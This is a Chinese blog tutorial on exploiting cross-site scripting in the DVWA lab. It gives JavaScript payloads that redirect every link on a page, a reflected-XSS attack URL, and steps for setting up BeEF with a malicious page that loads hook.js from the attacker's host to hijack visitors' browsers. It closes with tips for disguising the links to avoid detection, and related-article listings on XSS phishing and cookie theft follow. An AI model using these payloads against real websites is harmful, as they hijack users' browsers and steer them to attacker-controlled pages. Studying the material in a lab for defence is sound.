XSS漏洞利用手段/篡改链接实战/beef生成恶意网页

已于 2022-10-22 18:26:26 修改
阅读量1.3k 收藏 5
点赞数
分类专栏: XSS跨站脚本攻击 渗透测试 Kali  文章标签: xss javascript 网络安全 web安全
于 2022-10-10 20:34:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40345591/article/details/127250577
版权

目录

一、XSS篡改链接

二、篡改实战

三、 篡改链接指向恶意URL

beef生成恶意链接

创建恶意网页 

篡改链接指向恶意网页

四、总结

一、XSS篡改链接

<script>
window.onload=function(){
var link=document.getElementsByTagName("a");
for(i=0;i<link.length;i++){
    link[i].href="http://Chen_Ddbaoke.com/";}
}
</script>

来看这段javascript代码

首先window.onload-在网页加载的时候执行

document.getElementsByTagName("a")

获取所有的<a>标记的内容(也就是链接标记)

循环遍历,设置所有的链接为Chen_D的博客(篡改网页链接)

这样所有的链接都会指向Chen_D的博客,以达到刷访问量的作用

二、篡改实战

打开dvwa

看到这些链接了嘛,我们要做的就是通过XSS把这些链接都链接到我们的博客上,我们构建payload

<script>
window.onload=function(){
var link=document.getElementsByTagName("a");
for(i=0;i<link.length;i++){
    link[i].href="https://blog.csdn.net/qq_40345591/article/details/127226910?spm=1001.2014.3001.5501";}
}
</script>

 我们直接输入到输入框中提交

看到这些链接的真实地址已经变成了我们上一篇文章,我们点击任意一个

直接跳转进来啦,这就成功啦

但是正常环境中我们不能在输入框中输入,我们要构造一个url,那也简单

http://127.0.0.1:8090/dvwa/vulnerabilities/xss_r/?name=
<script>
window.onload=function(){
var link=document.getElementsByTagName("a");
for(i=0;i<link.length;i%2B%2B){
    link[i].href="https://blog.csdn.net/qq_40345591/article/details/127226910?spm=1001.2014.3001.5501";}
}
</script>#

 唯一要注意的就是把+换成%2B,刚才没换,直接死循环给我卡死了,换成%2B就欧克啦

点击任意一个链接都能进入我们的博客

当然篡改链接不一定都是指向这种无害的只是为了流量的网站,篡改链接更有可能指向一些恶意代码组成的恶意网页

三、 篡改链接指向恶意URL

beef生成恶意链接

打开kali,输入beef-xss

如果没安装beef直接运行下面指令

apt-get update

apt-get install beef-xss

需要保证kali是可以连上外网,并且换过镜像源的

拿到以下信息

第一次使用beef-xss的同学,在运行时会让你设置一个密码,这是用来进入后台的

cat /etc/beef-xss/config.yaml

 如果忘了这条指令可以查看账号和密码,默认账号是beef

这个时候我们要构造一个网页上传这个脚本,用户在访问的时候就被劫持了

创建恶意网页 

接下来我们start 一个apache 服务

先瞅一眼ip

leafpad index.html

没装按提示安装就行

打开之后在里面加入一行

<script src="http://<IP>:3000/hook.js"></script>
具体IP是刚才查到的ip
我这里是
<script src="http://172.20.10.5:3000/hook.js"></script>

 

 插入进去就行啦,这样我们的恶意网页就做好了

我们可以直接访问一下

http://172.20.10.5/index.html

只要一访问就中招了,因为这个网页里面我们加了beef的恶意代码

直接去beef里看看

看到没,我们的主机已经被劫持了,beef的功能很多,劫持之后操作空间非常大,后面会专门更新beef的操作这里就不赘述了

篡改链接指向恶意网页

现在是我们直接访问这个恶意网页被劫持了,我们这一章写的是XSS篡改链接啊,所以下一步就是篡改链接指向我们的恶意网站

<script>
window.onload=function(){
var link=document.getElementsByTagName("a");
for(i=0;i<link.length;i++){
    link[i].href="http://172.20.10.5/index.html";}
}
</script>

这里就不写成链接的形式啦,直接在输入框里输入就行

提交后,随便点一个链接都会直接进到我们的恶意网页里

成功被劫持了

四、总结

这章的实验看上去很容易被发现吧,那要是把链接伪造成正常连接的样子呢,再把网页伪造一下,或者就进一下就给你重定向回来等等,是不是就很难发现啦

白帽Chen_D
关注
专栏目录
利用XSS进行网页钓鱼
Monsterlz123的博客
07-22 6684
XSS漏洞】利用XSS进行网页钓鱼 Hello 各位小伙伴周末晚上好 这里是你们微胖的小编Monster。 话说小编的老妈今天给小编打电话,叮嘱我平时吃饭少吃一点… 说昨天看我朋友圈发的照片,已经从以前的瓜子脸,变成国字脸了… Whatever,让我们一起来看看今天的内容吧 一、实验概述 实验拓扑: 利用XSS漏洞,我们可以在网页中插入恶意js代码,通过js代码,我们可以干很多事情,例...
XSS篡改网页链接学习记录
weixin_50597969的博客
04-15 902
XSS篡改网页链接学习记录JS代码讲解XSS篡改链接篡改链接指向流量URL篡改链接指向恶意URL JS代码讲解 window.onload 当窗口加载时,执行匿名函数。 使用for循环遍历所有获得的链接a标签。 <script> window.onload = function(){ var link=document.getElementsByTagName("a"); //获取a标签,由于页面不一定只有一个a标签,link也可是个数组 for(j=0;j<link.length;j
xss漏洞(三,xss进阶利用)
最新发布
2302_80280669的博客
08-03 681
假如dvwa是你常用的网站,并且已经登录,你不知道此页面存在xss注入,黑客利用xss漏洞获取你cookie.他先打开此网站,构造了恶意语句,然后拿到URL,把URL进行包装,最后发给受害者你,你作为受害者一点击,自己的cookie就发送到了黑客特定的的文件里,黑客就拿到了你的cookie。本段代码的整体含义为:插入地址为1的图片,若无法执行(报错),便执行弹窗为‘hello’的操作。标签是将一张图嵌入的意思,src=后跟所嵌入的图片地址,onError=后跟若前面的代码无法执行所进行的操作。
27、XSS漏洞(恶意链接)
weixin_41489908的博客
12-26 889
一、环境:DVWA 二、修改网页链接 1、点击下面的网址,访问的是不同的内容 2、通过xss漏洞,修改这些网址都指向百度 window.onload:当窗口加载时,执行匿名函数 3、在漏洞处输入上面代码,提交 4、点击这些网址,都是跳转到百度,查看审查元素 三、生成恶意链接(kali攻击,win7被攻击) 1、kali启动beff-xss 2、启动apache服务:service ap...
XSS个人学习 之网页篡改
qq_57774303的博客
12-08 214
注意如果想要输入的xss语句成功反弹到beef-xss上就必须在kali的攻击机上的浏览器访问八个页面进行语句的插入。由此可知 kali机器的ip地址是192.168.56.129。输入要克隆的站点地址 如图所示是一个 我们教学的地址。现在我们将链接修改一下,看是否会成功,发现不能输入了 去控制台更改编写的长度。用beef-xss生成恶意链接。如图所示,我们的替换取得了成功。setroolkit伪造网站。我们看到了用户的账户和密码。这是XSS篡改链接的代码。启动setrookit。
网页篡改实验(6)
yyj1781572的博客
02-08 1008
本实验主要介绍了网页篡改实验,通过本实验的学习,你能够了解网页篡改基本原理,掌握和使用防篡改规则保护网站。
XSS跨站脚本攻击理论和实战 XSS构造脚本+手动XSS+利用BEef自动化XSS网络安全学习13)
Until_U的博客
07-06 5724
CONTENTS 1 XSS简介 2 构造XSS脚本 2.1 常用的HTML标签 2.2 常用java script方法 2.3 构造XSS脚本 3 反射型XSS 4 存储型XSS 5 kali渗透获取cookie 6 自动化XSS 6.1 BEef简介 6.2 BEef的主要功能 6.3 BEef实战 1 XSS简介 (1)XSS相关概念 跨站脚本( cross site script )为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现...
WEB漏洞篇——跨站脚本攻击(XSS
m0_56634355的博客
06-05 4724
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
XSS与SQL注入
weixin_51909453的博客
12-15 1245
XSS与SQL注入 1.实验目的 实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 2.实验过程 实验步骤: XSS部分:利用Beef
XSS和SQL注入
qq_45721890的博客
12-14 1205
实验三 XSS和SQL注入 说明:套用实验报告模板,红色部分无需复制到报告。 实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验原
XSS篡改网页链接
qq_43776408的博客
07-27 1363
JS代码讲解 第一行字面意思 windows:窗口 onload:加载 先把a标签内容都存到link中 然后把a标签的链接都改为其他URL XSS篡改链接 把代码全复制到XSS反射框框中 然后你随便点底下某一个链接 然后查看源代码 发现链接被替换为attacker了 你也可以用存储型XSS试验 只不过用反射性你在重进一次网站就消失了 而存储型是永久存在 篡改链接指向流量URL 其实就是将刚才attacker链接改为其他的 比如微博链接 篡改链接指向恶意URL 需要用到kali的beef ...
XSS漏洞讲解与多篇实战讲解
浪子燕青的博客
02-25 3441
跨站脚本攻击 XSS攻击基础 概述 个人对XSS攻击的原理认知: 原理:对可以控制传参的位置,比如url链接中,输入框中,首先闭合输出参数位置前后网页标签,在闭合的中间加上JavaScript代码或者其他的html标签,使得网页能够执行你添加的参数功能。 危害:凡是js能做的,大部分xss漏洞都能利用,常见的比如获取当前cookie,获取浏览器保存的账号密码 、获取屏幕截图,获取页面的数据,改变页面的逻辑,向服务器发送数据请求等。 情景:在挖洞的情景下,只要保证能弹个窗,或者执行js代码即可。但是
基于XSS网页篡改网页劫持,网页钓鱼
qq_40334963的博客
11-04 6307
基于XSS网页篡改网页劫持,网页钓鱼 192.168.80.174服务器上存在漏洞页面xss.php 192.168.80.160服务器上有调用的js xss.php: <?php $op = empty($_GET['op']) ? 'Not entered' : $_GET['op']; echo $op; ?> 浏览器地址栏构建简单的反射型xss判断是否存在xss htt...
渗透测试27---xss漏洞实战
初遇我ㄖ寸の热情呢?
04-14 7879
结合钓鱼网站就可以做坏事 上次演示是用nc临时接收是可以的,但是在长期的使用中,必须要有一个平台 在一个服务器上面,可以做:获取cookie,ip,用户名,密码 抓到session之后,可以做权限维持。放到自己的数据库里面,随时能抓到最新的额sessionid,别人一点察觉没有 蓝莲花xss数据接收平台 https://github.com/firesunCN/BlueLotus_XSSRec...
XSS漏洞(xss_and_mysql_file靶场实战)——渗透day10
qq_62716256的博客
09-07 2063
XSS漏洞(xss_and_mysql_file靶场实战)——day10
beef利用xss漏洞实现攻击
m0_61506558的博客
08-22 1168
beef是一个XSS平台,有非常多的功能Exploit 模块用的最多,但初学者用Browser就足够了Beef-XSS平台基本使用 https://www.bilibili.com/video/av92711691/
XSS攻击实战
qidiandexiaowu
09-20 497
实验环境:kail虚拟机与本机 先来kail里操作一波 ①开启kail的apache服务,开启命令/etc/init.d/apache2 start 第一步成功了! ②进入/var/www/html/里创建新文件cookie.php,命令:sudo touch cookie.php ③再用vi进行编辑,命令sudo vi cookie.php <?php $cookie = $_GET['cookie']; $ip = getenv ('REMOTE_ADDR'); $time = date('Y-
XSS (跨站脚本攻击) 分析与实战
a10534126的博客
02-23 1691
文章目录 一、漏洞原理 1、XSS简介: 2、XSS原理解析: 3、XSS的分类: 3.1、反射型XSS 3.2、存储型XSS 3.3、DOM型XSS 二、靶场实战 XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安
XSS漏洞,通过XSS实现网页挂马
qq_2411772106的博客
02-11 2232
首先我们的目标是一个存在存储型 XSS 漏洞的网页,看过我前面文章的小伙伴们应该知道,DVWA 平台上就有专门给我们练习存储型 XSS 漏洞的页面,我们就通过这个网页来实践挂马。2、将木马服务器的URL,插入到一个存在存储型XSS漏洞的正常web服务器中,一旦有人访问该服务器的挂马页面,而且该用户存在MS14_064漏洞,就会中招。攻击载荷模块(payload),目标系统被成功渗透后执行的代码,payload 中的主要内容包括 shellcode,一段获取 shell 的代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽Chen_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值